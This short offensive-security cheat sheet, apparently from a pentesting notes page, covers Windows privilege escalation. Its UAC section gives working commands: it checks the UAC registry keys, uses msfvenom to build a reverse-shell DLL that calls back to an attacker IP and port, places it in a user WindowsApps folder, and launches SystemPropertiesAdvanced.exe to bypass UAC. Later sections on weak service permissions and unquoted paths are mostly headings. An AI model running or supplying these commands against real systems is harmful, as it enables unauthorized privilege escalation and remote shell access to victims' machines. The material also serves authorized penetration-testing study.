OS Attacks

User Account Control (UAC)

Confirming UAC Enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Checking UAC Level (When Enabled)

 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

https://github.com/hfiref0x/UACME

Bypassing UAC (Method)

# Checking Path Variable
cmd /c echo %PATH%

# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Weak Permissions

Weak Permission Audit

https://github.com/GhostPack/SharpUp/

Manually Permission Check

1 Replace Service Bin Path

2 Restart Service

Unquoted Service Path

Find Unquoted Service Paths

Check Weak Service ACL (Accessschk.exe)

Modify Image-Path

Vulnerable Services

Gather Installed Programs

Gather Running Service

PoC

Last updated